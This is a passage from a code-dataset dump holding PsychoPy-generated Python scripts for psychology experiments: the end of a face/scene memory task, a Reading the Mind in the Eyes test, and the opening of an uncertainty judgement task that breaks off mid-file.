rangemat=np.reshape(rangemat, (runNum,-1))\n a1=i>=rangemat[:,0]\n a2=i<rangemat[:,1]\n b=a1*a2\n idx=np.where(b)\n this_cb=counterbalance[idx]\n trialType.append(this_cb)\n malvsfem=[0]*int(totTrialNum/2)+[1]*int(totTrialNum/2)\n seed(int(expInfo['participant'])+15)\n shuffle(malvsfem)\n seed(int(expInfo['participant'])+i+12)\n firstorsecond=np.random.randint(0,100)\n faceorscene=np.random.randint(0,100)\n RorL=np.random.randint(0,100)\n if malvsfem[i]==0: #male faces\n faceList1.append(male1[0])\n faceList2.append(male2[0])\n if this_cb=='f': #face condition\n if order[i]==0:\n target.append(male_rest[0])\n male_rest=np.delete(male_rest,0)\n elif order[i]==1:\n firstorsecond=np.random.randint(0,100)\n if firstorsecond<50:\n target.append(male1[0])\n else:\n target.append(male2[0])\n elif this_cb=='b' and faceorscene<50: #both, face target\n if order[i]==0:\n target.append(male_rest[0])\n male_rest=np.delete(male_rest,0)\n elif order[i]==1:\n if firstorsecond<50:\n target.append(male1[0])\n else:\n target.append(male2[0])\n male1=np.delete(male1,0)\n male2=np.delete(male2,0)\n elif malvsfem[i]==1: #female faces\n faceList1.append(female1[0])\n faceList2.append(female2[0])\n if this_cb=='f': #face condition\n if order[i]==0:\n target.append(female_rest[0])\n female_rest=np.delete(female_rest,0)\n elif order[i]==1:\n if firstorsecond<50:\n target.append(female1[0])\n else:\n target.append(female2[0])\n elif this_cb=='b' and faceorscene<50: #both, face target\n if order[i]==0:\n target.append(female_rest[0])\n female_rest=np.delete(female_rest,0)\n elif order[i]==1:\n if firstorsecond<50:\n target.append(female1[0])\n else:\n target.append(female2[0])\n female1=np.delete(female1,0)\n female2=np.delete(female2,0)\n if this_cb=='b' and faceorscene>=50: #both, scene target\n if order[i]==0:\n target.append(scenes_rest[0])\n scenes_rest=np.delete(scenes_rest,0)\n elif order[i]==1:\n if firstorsecond<50:\n target.append(sceneList1[i])\n else:\n target.append(sceneList2[i])\n elif this_cb=='s': #scene condition\n if order[i]==0:\n target.append(scenes_rest[0])\n scenes_rest=np.delete(scenes_rest,0)\n elif order[i]==1:\n if firstorsecond<50:\n target.append(sceneList1[i])\n else:\n target.append(sceneList2[i])\n elif this_cb=='p': #passive condition\n if RorL<50:\n target.append(arrows[0])\n else:\n target.append(arrows[1])\nmyarray = []\nfor i in range(len(order)):\n myarray.append({'face1': faceList1[i], 'scene1': sceneList1[i], 'face2': faceList2[i], 'scene2': sceneList2[i], 'target': target[i], 'order': order[i], 'trialType_index': i}) #puts data into an array of dictionaries that the TrialHandler function will accept\ntrials=data.TrialHandler(nReps=1, method=u'sequential', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=None, name='trials')\nthisExp.addLoop(trials)#add the loop to the experiment\nthisTrial=trials.trialList[0]#so we can initialise stimuli with some values\n#abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\nif thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\ninstrScreens=[]\nfor x in range(1,runNum):\n instrScreens.append(runLength*x)\ninstrScreens=[0]+instrScreens\nfor thisTrial in trials:\n \n if trials.thisTrialN in instrScreens:\n \n if trialType[trialType_index+1]=='f':\n instr_f.draw()\n elif trialType[trialType_index+1]=='s':\n instr_s.draw()\n elif trialType[trialType_index+1]=='b':\n instr_b.draw()\n elif trialType[trialType_index+1]=='p':\n instr_p.draw()\n win.flip()\n event.waitKeys(keyList=['return','+'])\n \n currentLoop = trials\n #abbrieviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n #------Prepare to start Routine\"trial\"-------\n t=0; trialClock.reset() #clock \n frameN=-1\n# routineTimer.add(7.200000)\n #update component parameters for each repeat\n image1.setImage(face1)\n image2.setImage(scene1)\n image3.setImage(face2)\n image4.setImage(scene2)\n image5.setImage(target)\n targ_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\n targ_resp.status=NOT_STARTED\n #keep track of which components have finished\n trialComponents=[]\n trialComponents.append(image1)\n trialComponents.append(image2)\n trialComponents.append(image3)\n trialComponents.append(image4)\n trialComponents.append(delay)\n trialComponents.append(image5)\n trialComponents.append(targ_resp)\n trialComponents.append(ITI)\n for thisComponent in trialComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"trial\"-------\n continueRoutine=True\n while continueRoutine:# and routineTimer.getTime()>0:\n #get current time\n t=trialClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*image1* updates\n if t>=0.0 and image1.status==NOT_STARTED:\n #keep track of start time/frame for later\n image1.tStart=t#underestimates by a little under one frame\n image1.frameNStart=frameN#exact frame index\n image1.setAutoDraw(True)\n elif image1.status==STARTED and t>=(0.0+0.8):\n image1.setAutoDraw(False)\n \n #*image2* updates\n if t>=0.8 and image2.status==NOT_STARTED:\n #keep track of start time/frame for later\n image2.tStart=t#underestimates by a little under one frame\n image2.frameNStart=frameN#exact frame index\n image2.setAutoDraw(True)\n elif image2.status==STARTED and t>=(0.8+0.8):\n image2.setAutoDraw(False)\n \n #*image3* updates\n if t>=1.6 and image3.status==NOT_STARTED:\n #keep track of start time/frame for later\n image3.tStart=t#underestimates by a little under one frame\n image3.frameNStart=frameN#exact frame index\n image3.setAutoDraw(True)\n elif image3.status==STARTED and t>=(1.6+0.8):\n image3.setAutoDraw(False)\n \n #*image4* updates\n if t>=2.4 and image4.status==NOT_STARTED:\n #keep track of start time/frame for later\n image4.tStart=t#underestimates by a little under one frame\n image4.frameNStart=frameN#exact frame index\n image4.setAutoDraw(True)\n elif image4.status==STARTED and t>=(2.4+0.8):\n image4.setAutoDraw(False)\n \n #*delay* updates\n if t>=3.2 and delay.status==NOT_STARTED:\n #keep track of start time/frame for later\n delay.tStart=t#underestimates by a little under one frame\n delay.frameNStart=frameN#exact frame index\n delay.setAutoDraw(True)\n elif delay.status==STARTED and t>=(3.2+1.0):\n delay.setAutoDraw(False)\n \n #*image5* updates\n if t>=4.2 and image5.status==NOT_STARTED:\n #keep track of start time/frame for later\n image5.tStart=t#underestimates by a little under one frame\n image5.frameNStart=frameN#exact frame index\n image5.setAutoDraw(True)\n elif image5.status==STARTED and t>=(4.2+1.0):\n image5.setAutoDraw(False)\n \n #*ITI* updates\n if t>=5.2 and ITI.status==NOT_STARTED:\n #keep track of start time/frame for later\n ITI.tStart=t#underestimates by a little under one frame\n ITI.frameNStart=frameN#exact frame index\n ITI.setAutoDraw(True)\n elif ITI.status==STARTED and t>=(5.2+2.0):\n ITI.setAutoDraw(False)\n \n #*targ_resp* updates\n if t>=4.2 and targ_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n targ_resp.tStart=t#underestimates by a little under one frame\n targ_resp.frameNStart=frameN#exact frame index\n targ_resp.status=STARTED\n #keyboard checking is just starting\n targ_resp.clock.reset() # now t=0\n event.clearEvents()\n elif targ_resp.status==STARTED and t>=(4.2+1.5):\n targ_resp.status=STOPPED\n if targ_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['1', '2'])\n if len(theseKeys)>0:#at least one key was pressed\n targ_resp.keys=theseKeys[-1]#just the last key pressed\n targ_resp.rt = targ_resp.clock.getTime()\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"trial\"\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n #check responses\n if len(targ_resp.keys)==0: #No response was made\n targ_resp.keys=None\n #store data for trials (TrialHandler)\n trials.addData('targ_resp.keys',targ_resp.keys)\n if targ_resp.keys != None:#we had a response\n trials.addData('targ_resp.rt',targ_resp.rt)\n thisExp.nextEntry()\n\n#completed 1 repeats of 'trials'\n if trialType[trialType_index]=='p':\n if target=='Stim/arrow_l.jpg':\n if targ_resp.keys=='1':\n hits=1\n else:\n hits=0\n if targ_resp.keys=='2':\n misses=1\n else:\n misses=0\n elif target=='Stim/arrow_r.jpg':\n if targ_resp.keys=='2':\n hits=1\n else:\n hits=0\n if targ_resp.keys=='1':\n misses=1\n else:\n misses=0\n FAs='N/A'\n else:\n if order==1 and targ_resp.keys=='1':\n hits=1\n else:\n hits=0\n if order==1 and targ_resp.keys!='1':\n misses=1\n else:\n misses=0\n if order==0 and targ_resp.keys=='1':\n FAs=1\n else:\n FAs=0\n datFile.write('%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n'%(trials.thisTrialN+1,face1,scene1,face2,scene2,target,trialType[trialType_index],targ_resp.keys,order,hits,misses,FAs,targ_resp.rt))\ndatFile.close()\n\n#get names of stimulus parameters\nif trials.trialList in ([], [None], None): params=[]\nelse: params = trials.trialList[0].keys()\n#save data for this loop\ntrials.saveAsPickle(filename+'trials', fileCollisionMethod='rename')\ntrials.saveAsExcel(filename+'.xlsx', sheetName='trials',\n stimOut=params,\n dataOut=['n','all_mean','all_std', 'all_raw'])\n\n#Shutting down:\nwin.close()\ncore.quit()\n"
},
{
"alpha_fraction": 0.6618810892105103,
"alphanum_fraction": 0.6811507344245911,
"avg_line_length": 41.90163803100586,
"blob_id": "5fa87ad286cda2ef6ec76030a38f7935f5bc704a",
"content_id": "ef308c74244d7b42b1610c0d606ffdc42c44e25e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18319,
"license_type": "no_license",
"max_line_length": 460,
"num_lines": 427,
"path": "/RMET.py",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.74.00), Fri Jan 17 14:46:44 2014\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division #so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, gui\nfrom psychopy.constants import * #things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle\nimport os #handy system and path functions\n\n#store info about the experiment session\nexpName='RMET_skeleton'#from the Builder filename that created this script\nexpInfo={'participant':'','group':'pilot', 'session':'001'}\ndlg=gui.DlgFromDict(dictionary=expInfo,title=expName)\nif dlg.OK==False: core.quit() #user pressed cancel\nexpInfo['date']=data.getDateStr()#add a simple timestamp\nexpInfo['expName']=expName\nfilename='data' + os.path.sep + '%s_%s_%s' %(expInfo['group'], expInfo['participant'], expInfo['session'])\nlogging.console.setLevel(logging.WARNING)#this outputs to the screen, not a file\n\n#an ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=None,\n savePickle=True, saveWideText=False,\n dataFileName=filename)\ndatFile=open(filename+'.txt','a')\ndatFile.write('Trial\\tpicID\\tanswer\\thit\\tRT\\n')\n\n#setup the Window\nwin = visual.Window(size=(1440, 900), fullscr=True, screen=0, allowGUI=False, allowStencil=False,\n monitor=u'testMonitor', color=u'white', colorSpace=u'rgb')\n\n#Initialise components for Routine \"instr\"\ninstrClock=core.Clock()\ninstructions=visual.TextStim(win=win, ori=0, name='instructions',\n text=\"For each set of eyes, select the number corresponding to the word that best describes what the person in the picture is thinking or feeling. You may feel that more than one word is applicable, but please choose just one word, the word which you consider to be most suitable. Before making your choice, make sure that you have read all 4 words. You should try to do the task as quickly as possible but you will not be timed. Press 'enter' to begin.\",\n font='Arial',\n pos=[0, 0], height=0.05,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=0.0)\n\n#Initialise components for Routine \"pract\"\npractClock=core.Clock()\npractice=visual.PatchStim(win=win, name='practice',\n tex='stimuli/pic00.jpg', mask=None,\n ori=0, pos=[0, 0], size=[0.5, 0.5], sf=None, phase=0.0,\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=0.0)\npract_w1=visual.TextStim(win=win, ori=0, name='pract_w1',\n text='jealous',\n font='Arial',\n pos=[-0.5, 0.5], height=0.1,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=-1.0)\npract_w2=visual.TextStim(win=win, ori=0, name='pract_w2',\n text='panicked',\n font='Arial',\n pos=[0.5, 0.5], height=0.1,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=-2.0)\npract_w3=visual.TextStim(win=win, ori=0, name='pract_w3',\n text='arrogant',\n font='Arial',\n pos=[-0.5, -0.5], height=0.1,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=-3.0)\npract_w4=visual.TextStim(win=win, ori=0, name='pract_w4',\n text='hateful',\n font='Arial',\n pos=[0.5, -0.5], height=0.1,wrapWidth=None,\n color='black', colorSpace='rgb', opacity=1,\n depth=-4.0)\n\n#Initialise components for Routine \"trial\"\ntrialClock=core.Clock()\nstimulus=visual.PatchStim(win=win, name='stimulus',\n tex='sin', mask=None,\n ori=0, pos=[0, 0], size=[0.5, 0.5], sf=None, phase=0.0,\n color=[1,1,1], colorSpace='rgb', opacity=1,\n texRes=128, interpolate=True, depth=0.0)\ntrial_word1=visual.TextStim(win=win, ori=0, name='trial_word1',\n text='nonsense',\n font=u'Arial',\n pos=[-0.5, 0.5], height=0.1,wrapWidth=None,\n color=u'black', colorSpace=u'rgb', opacity=1,\n depth=-1.0)\ntrial_word2=visual.TextStim(win=win, ori=0, name='trial_word2',\n text='nonsense',\n font=u'Arial',\n pos=[0.5, 0.5], height=0.1,wrapWidth=None,\n color=u'black', colorSpace=u'rgb', opacity=1,\n depth=-2.0)\ntrial_word3=visual.TextStim(win=win, ori=0, name='trial_word3',\n text='nonsense',\n font=u'Arial',\n pos=[-0.5, -0.5], height=0.1,wrapWidth=None,\n color=u'black', colorSpace=u'rgb', opacity=1,\n depth=-3.0)\ntrial_word4=visual.TextStim(win=win, ori=0, name='trial_word4',\n text='nonsense',\n font=u'Arial',\n pos=[0.5, -0.5], height=0.1,wrapWidth=None,\n color=u'black', colorSpace=u'rgb', opacity=1,\n depth=-4.0)\n\n# Create some handy timers\nglobalClock=core.Clock() #to track the time since experiment started\nroutineTimer=core.CountdownTimer() #to track time remaining of each (non-slip) routine \n\n#------Prepare to start Routine\"instr\"-------\nt=0; instrClock.reset() #clock \nframeN=-1\n#update component parameters for each repeat\ninstr_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\ninstr_resp.status=NOT_STARTED\n#keep track of which components have finished\ninstrComponents=[]\ninstrComponents.append(instructions)\ninstrComponents.append(instr_resp)\nfor thisComponent in instrComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n#-------Start Routine \"instr\"-------\ncontinueRoutine=True\nwhile continueRoutine:\n #get current time\n t=instrClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*instructions* updates\n if t>=0.0 and instructions.status==NOT_STARTED:\n #keep track of start time/frame for later\n instructions.tStart=t#underestimates by a little under one frame\n instructions.frameNStart=frameN#exact frame index\n instructions.setAutoDraw(True)\n \n #*instr_resp* updates\n if t>=0.0 and instr_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n instr_resp.tStart=t#underestimates by a little under one frame\n instr_resp.frameNStart=frameN#exact frame index\n instr_resp.status=STARTED\n #keyboard checking is just starting\n instr_resp.clock.reset() # now t=0\n event.clearEvents()\n if instr_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys)>0:#at least one key was pressed\n instr_resp.keys=theseKeys[-1]#just the last key pressed\n instr_resp.rt = instr_resp.clock.getTime()\n #abort routine on response\n continueRoutine=False\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in instrComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n\n#End of Routine \"instr\"\nfor thisComponent in instrComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n\n#------Prepare to start Routine\"pract\"-------\nt=0; practClock.reset() #clock \nframeN=-1\n#update component parameters for each repeat\npract_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\npract_resp.status=NOT_STARTED\n#keep track of which components have finished\npractComponents=[]\npractComponents.append(practice)\npractComponents.append(pract_w1)\npractComponents.append(pract_w2)\npractComponents.append(pract_w3)\npractComponents.append(pract_w4)\npractComponents.append(pract_resp)\nfor thisComponent in practComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n#-------Start Routine \"pract\"-------\ncontinueRoutine=True\nwhile continueRoutine:\n #get current time\n t=practClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*practice* updates\n if t>=0.0 and practice.status==NOT_STARTED:\n #keep track of start time/frame for later\n practice.tStart=t#underestimates by a little under one frame\n practice.frameNStart=frameN#exact frame index\n practice.setAutoDraw(True)\n \n #*pract_w1* updates\n if t>=0.0 and pract_w1.status==NOT_STARTED:\n #keep track of start time/frame for later\n pract_w1.tStart=t#underestimates by a little under one frame\n pract_w1.frameNStart=frameN#exact frame index\n pract_w1.setAutoDraw(True)\n \n #*pract_w2* updates\n if t>=0.0 and pract_w2.status==NOT_STARTED:\n #keep track of start time/frame for later\n pract_w2.tStart=t#underestimates by a little under one frame\n pract_w2.frameNStart=frameN#exact frame index\n pract_w2.setAutoDraw(True)\n \n #*pract_w3* updates\n if t>=0.0 and pract_w3.status==NOT_STARTED:\n #keep track of start time/frame for later\n pract_w3.tStart=t#underestimates by a little under one frame\n pract_w3.frameNStart=frameN#exact frame index\n pract_w3.setAutoDraw(True)\n \n #*pract_w4* updates\n if t>=0.0 and pract_w4.status==NOT_STARTED:\n #keep track of start time/frame for later\n pract_w4.tStart=t#underestimates by a little under one frame\n pract_w4.frameNStart=frameN#exact frame index\n pract_w4.setAutoDraw(True)\n \n #*pract_resp* updates\n if t>=0.0 and pract_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n pract_resp.tStart=t#underestimates by a little under one frame\n pract_resp.frameNStart=frameN#exact frame index\n pract_resp.status=STARTED\n #keyboard checking is just starting\n pract_resp.clock.reset() # now t=0\n event.clearEvents()\n if pract_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['1', '2', '3', '4'])\n if len(theseKeys)>0:#at least one key was pressed\n pract_resp.keys=theseKeys[-1]#just the last key pressed\n pract_resp.rt = pract_resp.clock.getTime()\n #was this 'correct'?\n if (pract_resp.keys==str(\"'2'\")): pract_resp.corr=1\n else: pract_resp.corr=0\n #abort routine on response\n continueRoutine=False\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in practComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n\n#End of Routine \"pract\"\nfor thisComponent in practComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n\n#set up handler to look after randomisation of conditions etc\ntrials=data.TrialHandler(nReps=1, method=u'random', \n extraInfo=expInfo, originPath=None,\n trialList=data.importConditions('conditions.xlsx'),\n seed=int(expInfo['participant']), name='trials')\nthisExp.addLoop(trials)#add the loop to the experiment\nthisTrial=trials.trialList[0]#so we can initialise stimuli with some values\n#abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\nif thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n\nfor thisTrial in trials:\n currentLoop = trials\n #abbrieviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n #------Prepare to start Routine\"trial\"-------\n t=0; trialClock.reset() #clock \n frameN=-1\n #update component parameters for each repeat\n stimulus.setImage(stim)\n trial_word1.setText(word1)\n trial_word2.setText(word2)\n trial_word3.setText(word3)\n trial_word4.setText(word4)\n key_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\n key_resp.status=NOT_STARTED\n #keep track of which components have finished\n trialComponents=[]\n trialComponents.append(stimulus)\n trialComponents.append(trial_word1)\n trialComponents.append(trial_word2)\n trialComponents.append(trial_word3)\n trialComponents.append(trial_word4)\n trialComponents.append(key_resp)\n for thisComponent in trialComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"trial\"-------\n continueRoutine=True\n while continueRoutine:\n #get current time\n t=trialClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*stimulus* updates\n if t>=0.0 and stimulus.status==NOT_STARTED:\n #keep track of start time/frame for later\n stimulus.tStart=t#underestimates by a little under one frame\n stimulus.frameNStart=frameN#exact frame index\n stimulus.setAutoDraw(True)\n \n #*trial_word1* updates\n if t>=0.0 and trial_word1.status==NOT_STARTED:\n #keep track of start time/frame for later\n trial_word1.tStart=t#underestimates by a little under one frame\n trial_word1.frameNStart=frameN#exact frame index\n trial_word1.setAutoDraw(True)\n \n #*trial_word2* updates\n if t>=0.0 and trial_word2.status==NOT_STARTED:\n #keep track of start time/frame for later\n trial_word2.tStart=t#underestimates by a little under one frame\n trial_word2.frameNStart=frameN#exact frame index\n trial_word2.setAutoDraw(True)\n \n #*trial_word3* updates\n if t>=0.0 and trial_word3.status==NOT_STARTED:\n #keep track of start time/frame for later\n trial_word3.tStart=t#underestimates by a little under one frame\n trial_word3.frameNStart=frameN#exact frame index\n trial_word3.setAutoDraw(True)\n \n #*trial_word4* updates\n if t>=0.0 and trial_word4.status==NOT_STARTED:\n #keep track of start time/frame for later\n trial_word4.tStart=t#underestimates by a little under one frame\n trial_word4.frameNStart=frameN#exact frame index\n trial_word4.setAutoDraw(True)\n \n #*key_resp* updates\n if t>=0.0 and key_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n key_resp.tStart=t#underestimates by a little under one frame\n key_resp.frameNStart=frameN#exact frame index\n key_resp.status=STARTED\n #keyboard checking is just starting\n key_resp.clock.reset() # now t=0\n event.clearEvents()\n if key_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['1', '2', '3', '4'])\n if len(theseKeys)>0:#at least one key was pressed\n key_resp.keys=theseKeys[-1]#just the last key pressed\n key_resp.rt = key_resp.clock.getTime()\n #was this 'correct'?\n if (key_resp.keys==str(correctResponse)): key_resp.corr=1\n else: key_resp.corr=0\n #abort routine on response\n continueRoutine=False\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"trial\"\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n #check responses\n if len(key_resp.keys)==0: #No response was made\n key_resp.keys=None\n #was no response the correct answer?!\n if str(correctResponse).lower()=='none':key_resp.corr=1 #correct non-response\n else: key_resp.corr=0 #failed to respond (incorrectly)\n #store data for trials (TrialHandler)\n trials.addData('key_resp.keys',key_resp.keys)\n trials.addData('key_resp.corr',key_resp.corr)\n if key_resp.keys != None:#we had a response\n trials.addData('key_resp.rt',key_resp.rt)\n thisExp.nextEntry()\n\n#completed 1 repeats of 'trials'\n datFile.write('%s\\t%s\\t%s\\t%s\\t%s\\n'%(trials.thisTrialN+1,stim[11:13],key_resp.keys,key_resp.corr,key_resp.rt))\n\n#save data for this loop\n#trials.saveAsPickle(filename+'trials', fileCollisionMethod='rename')\n\n#Shutting down:\nwin.close()\ncore.quit()\n"
},
{
"alpha_fraction": 0.6017948985099792,
"alphanum_fraction": 0.6220579147338867,
"avg_line_length": 43.51507568359375,
"blob_id": "2aaf61651715745d76effbba599130a3d8f1e5c7",
"content_id": "36a5be74db8f23e657b740378f140afde90592c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17717,
"license_type": "no_license",
"max_line_length": 340,
"num_lines": 398,
"path": "/uncertainty.py",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.74.00), Mon Aug 27 12:00:54 2012\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division #so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, gui\nfrom psychopy.constants import * #things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle, seed\nimport os #handy system and path functions\n\n#store info about the experiment session\nexpName='unc_skeleton'#from the Builder filename that created this script\nexpInfo={'participant':'', 'session':'001'}\ndlg=gui.DlgFromDict(dictionary=expInfo,title=expName)\nif dlg.OK==False: core.quit() #user pressed cancel\nexpInfo['date']=data.getDateStr()#add a simple timestamp\nexpInfo['expName']=expName\n#setup files for saving\nif not os.path.isdir('data'):\n os.makedirs('data') #if this fails (e.g. permissions) we will get error\nfilename='data' + os.path.sep + '%s_uncertainty_%s' %(expInfo['participant'], expInfo['date'])\nlogFile=logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING)#this outputs to the screen, not a file\n\n#an ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=None,\n savePickle=True, saveWideText=True,\n dataFileName=filename)\ndatFile=open('data' + os.path.sep + '%s_uncertainty_%s.txt' %(expInfo['participant'], expInfo['date']),'a')\ndatFile.write('Trial\\tRun\\tpL/pR\\tStim\\tRorL\\tstimOnset\\trespRorL\\tcorrectness\\trespSize\\tRT\\n')\n\nrunNum=1\ntotRuns=5 #total runs plus 1 for practice\ntotStimNum=320 #not including practice, which always has 15\ncounterbalance = [0.95, 0.65, 0.35, 0.05]\nseed(int(expInfo['participant'])+94)\nshuffle(counterbalance)\nwhile runNum<=totRuns:\n #setup the Window\n win = visual.Window(size=(1920, 1080), fullscr=True, screen=0, allowGUI=False, allowStencil=False,\n monitor=u'testMonitor', color=u'white', colorSpace=u'rgb')\n \n #Initialise components for Routine \"instr\"\n instrClock=core.Clock()\n text=visual.TextStim(win=win, ori=0, name='text',\n text='Please indicate whether the item is smaller (1 or 9) or larger (2 or 0) than a shoebox.\\n\\nIf you believe the item will reappear on the left side of the screen, respond with the 1 and 2 keys.\\n\\nIf you believe the item will reappear on the right side of the screen, respond with the 9 and 0 keys.\\n\\nPress enter to continue.',\n font='Arial',\n pos=[0, 0.2], height=0.1,wrapWidth=1.8,\n color='black', colorSpace='rgb', opacity=1,\n depth=0.0)\n begExpClock=core.Clock()\n \n #Initialise components for Routine \"trial\"\n trialClock=core.Clock()\n RTclock=core.Clock()\n \n \n image=visual.ImageStim(win=win, name='image',units=u'pix', \n image='sin', mask=None,\n ori=0, pos=[0, 0], size=[256, 256],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=-3.0)\n RorL=visual.TextStim(win=win, ori=0, name='RorL',\n text=u\"1=smaller 2=larger 9=smaller 0=larger\",\n font=u'Arial',\n pos=[0, -0.5], height=0.1,wrapWidth=3,\n color=u'black', colorSpace=u'rgb', opacity=1,\n depth=-5.0)\n fix1=visual.TextStim(win=win, ori=0, name='fix1',\n text=u'+',\n font=u'Arial',\n pos=[0, 0], 